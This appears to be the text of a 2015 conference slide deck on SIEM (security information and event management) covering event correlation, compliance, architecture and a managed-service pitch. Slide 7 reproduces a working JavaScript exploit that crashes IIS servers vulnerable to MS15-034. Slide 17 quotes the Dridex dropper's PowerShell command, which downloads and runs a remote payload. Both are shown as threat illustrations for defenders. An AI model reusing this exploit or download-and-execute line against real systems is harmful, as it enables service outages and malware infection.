The document presents insights from a 2015 security conference focused on Security Information and Event Management (SIEM), highlighting the speaker's expertise in penetration testing and managed SIEM services for various clients. Key topics include the importance of SIEM for real-time threat visibility, compliance requirements, and the analysis of business risks associated with malware like Dridex. The document also outlines the architecture and features of SIEM solutions, emphasizing the need for efficient incident management and response strategies in cybersecurity.

1. 2015 Security Conference
Security, Information and
Event Management (SIEM)
Paul Dutot IEng MIET MBCS CITP QSTM OSCP

2. 2015 Security Conference
Who Am I
• Head of Penetration Testing and SIEM within
Security Department @ Logicalis Jersey.
• Tiger Scheme accredited Penetration Tester.
• Certified in McAfee ESM and Vulnerability
Manager.
• My role is a mix of ethical hacking and using those
skills to provide Managed SIEM to our clients.
• Founder member of the CIISF and secretary of the
Jersey BCS branch.
• Incorporated Engineer (IEng) / Chartered IT Professional (CITP).

3. 2015 Security Conference
Our clients
• Managed SIEM Incident Response – World Wide Engineering
Company in 68 countries.
• Managed SIEM - Fortune 100 American Financial Business –
23,000 IP’s in 26 countries.
• Managed SIEM for SMB’s – ranging from customers with 2
firewalls to 30 devices under management.
And everything in between………
All managed by staff at Logicalis In Jersey

4. 2015 Security Conference
What we shall talk about…
• SIEM Concepts
• What is SIEM. What does it solve?
• Meet the Dridex Malware
• Questions
• SIEM Architectures
• SIEM Features At A Glance
• Business Risks – Where are the threats?

5. 2015 Security Conference
Business Risks – Risks by Category
2014 2015
Source: Verizon Data Breach report

6. 2015 Security Conference
Business Risks – Incident Categorization by Industry Sector
Source: Verizon Data Breach report

7. 2015 Security Conference
MS 15-034 - How Fast the Bad Guys Move…
Microsoft patch for MS15-034 to reversed engineered exploit for sale on the Darknet < 6 days.
<script>
/*
Name: IISer.htm
Description: Crashes a Windows IIS host vulnerable to
MS15-034
Author: Malik Mesellem (@MME_IT)
*/
//Variables
var ip = "10.0.1.1";
var file = "welcome.png"; //For W2K8R2
// var file = "iis-85.png"; //For W2K12R2
var payload = "bytes=18-18446744073709551615";
//Tested on W2K8R2 and W2K12R2
var xmlhttp = new XMLHttpRequest();
//Sends the HTTP request 10 times
for (i = 0; i < 10; i++){
xmlhttp.open("GET", "http://" + ip + "/" + file, true);
xmlhttp.setRequestHeader("Range", payload);
xmlhttp.send();
}
alert("Bye bye IIS!");
</script>
http://pastebin.com/SbN55M2H

8. 2015 Security Conference
“ 90% of all incidents is people. Whether
it’s goofing up, getting infected, behaving
badly or losing stuff, most incidents fall
into the PEBKAC (Problem Exists Between
Keyboard and Chair) and ID-10T (idiot)
uber patterns.”
“Financial Motivation is also alive and
well in phishing attacks. The old
method of duping people into
providing their personnel identification
number or bank information is still
around but the targets are largely
individuals versus organizations.
Phishing with the intent of device
compromise is certainly present.”
Business Risks – Final Thoughts
Source: Verizon Data Breach report
Since October 2014, Jersey and
Guernsey companies across all sectors
have been targeted by the ‘Dridex’
malware through email phishing.

9. 2015 Security Conference
What is SIEM? What issues does it solve?
SIEM is the Evolution and Integration
of Two Distinct Technologies
 Security Event Management (SEM)
― Primarily focused on Collecting and
Aggregating Security Events
 Security Information Management (SIM)
― Primarily focused on the Enrichment,
Normalization, and Correlation of
Security Events
Security Information & Event
Management (SIEM) is a Set
of Technologies for:
 Log Data Collection
 Correlation
 Aggregation
 Normalization
 Retention
 Analysis and Workflow
Three Major Factors Driving the Majority of SIEM Implementations
1
Real-Time
Threat Visibility 2
Security
Operational
Efficiency
3
Compliance and/or Log
Management Requirements

10. 2015 Security Conference
SIEM Concepts – Visibility Problem
FACT: A small network with 20 Desktops will produce an
average 46 events per second (EPS) = 165,600 per hour
= 3,974,400 per diem. Bursts of events are 1.5 times
this figure.
Do you fancy trying to investigate that
amount of events for a security issue?

11. 2015 Security Conference
SIEM Concepts – Compliance Problem
PCI-DSS Compliance is one of the main drivers for a SIEM solution.
Meeting Section 10 – Logging Requirements is almost impossible without a SIEM!
There are at least 20 use cases to use SIEM to meet aspects of PCI-DSS – see
http://resources.infosecinstitute.com/siem-use-cases-pci-dss-3-0-part-1/

12. 2015 Security Conference
SIEM Concepts – Anatomy of an Event / Flow Life
Raw Logs / Flows
<164>Apr 15 2015 10:04:53:
%ASA-4-106023: Deny tcp src
InsideLAN:192.168.4.35/50381 dst
Outside:216.41.215.186/80 by
access-group "inside_in" [0x0, 0x0]
Raw Logs stored and forensically
tagged.
Raw logs are normalised.
Log Processed by Correlation
Engine
Raw logs stored in raw format.
Security Alert !!
• Events come from devices
such as workstations,
routers , AD servers and
security devices.
• Flows come from flow
collectors or flow
enabled devices such as
firewalls.
• Lots of different flow types
supported such as Netflow /
Qflow.
• Lots of different device
types and logging options.
Normalisation = the process of
getting different record formats
from different devices into a
common format.
SIEM solutions are sized by
capacity in term of Events Per
Second (EPS) primarily.

13. 2015 Security Conference
SIEM Concepts – Correlation
• Correlation is the process of looking at
events to determine relevance and
relationships to other events within the
network for example successful login after
brute force.
• It can be applied in real time and historical
modes with a variety of rule types.
• 175+ Correlation rules enabled by default.
• Correlation enables us to gain visibility
into other non traditional IT systems such
as Access Control and BMS.
• Correlation rules combined with Watch
Lists allow us to track security incidents in
real time such as a malware infection.

14. 2015 Security Conference
SIEM Architecture – ESM / REC / ELM
ELM
Servers Wireless
Access Points
Main Office
VPN Endpoints
IDS / IPS
Switches / Routers
Linux
Desktops
Receiver
ESM
• Events / Flows arrive at the receiver.
• Raw logs are tagged and stored in
the Enterprise Log Manager (ELM).
• Normalisation and Correlation takes
place in the Enterprise Security
Manager (ESM).
• Log collection can be in various
formats (Syslog / SDEE for example).
• Desktop collection cane be agent
based such as OSSEC HIDS or
agentless e.g. WMI.
• Solution can be ‘Cloud’ or ‘On
Premise’ or a ‘Hybrid’ with high
availability.

15. 2015 Security Conference
12 3
SIEM Features – At A Glance
• Powerful Investigation of Events –
find what is important in 3 clicks.
• Case Management of Incidents.
• Automate responses to Incidents.
• API to Interrogate / Update SIEM.
• Anomaly Behaviour Detection.
• Custom Dashboards and Powerful
Reporting.
• Zone Management.
• Integration with Threat Intelligence
Feeds – Public and Private.
• Data Enrichment allows us to
further augment log content.

16. 2015 Security Conference
Why use a Logicalis Managed SIEM solution?
• Expertise – Logicalis Jersey is the World Wide security centre of
excellence for Logicalis Group.
• Cost.
• Flexible consumption models.
• Strategic Partners.
• ISO27001 Certified.
• Redundant Data Centres in Jersey
and Guernsey resolving jurisdictional
data issues.
• Our multi tenanted solution ensures
data segregation at all levels.

17. 2015 Security Conference
Meet Dridex – Banking Malware
cmd /K PowerShell.exe (New-Object
System.Net.WebClient).DownloadFile('http://92.63.
88.63/kwefewef/fgdsee/dxzq.jpg','%TEMP%JIOiodf
hioIH.cab'); expand %TEMP%JIOiodfhioIH.cab
%TEMP%JIOiodfhioIH.exe; start
%TEMP%JIOiodfhioIH.exe;
It has code hidden in Excel spreadsheet
VBA macro virus with hidden URL
When decoded it
becomes…..
Feb 2015: Only 3 out of
57 AV Engines detected
it.
Apr 20-15 : 39 out of 55

18. 2015 Security Conference
Dridex C2
Server
Operator
File Server
AD Domain
Server
Database
Server
Higher Level
Hacker
ACME Trust – Anatomy of a Compromise
Database Server credentials are
obtained and the Database Server is
compromised. Data exfiltration begins..
Eventually AD compromised = network
compromised. You could find out like
this……
Malware installs a Key Logger
and a Remote Access Trojan
(RAT).
Access sold to higher level
hacker. Hacker uses already
compromised credentials
to upload Trojan versions /
documents to the file
server using credentials
obtained via key logger.

19. 2015 Security Conference
Real Reputational Damage
http://dpaste.dzfl.pl/866433ffd07a

20. 2015 Security Conference
Demo Time
Bypassing Anti Virus using Windows
Powershell in Excel

21. 2015 Security Conference
One for the Defenders
Hunting Malware with SysInternals Suite
Video
https://www.youtube.com/watch?v=Wuy_Pm3KaV8
PowerPoint
video.ch9.ms/sessions/teched/na/2014/DCIM-B368.pptx
“When combining the results from all four AV engines, less than
40% of the binaries were detected.”
Source:
CAMP: Content-Agnostic Malware Protection
Proceedings of 20th Annual Network & Distributed System Security Symposium

22. 2015 Security Conference
Thank You
Questions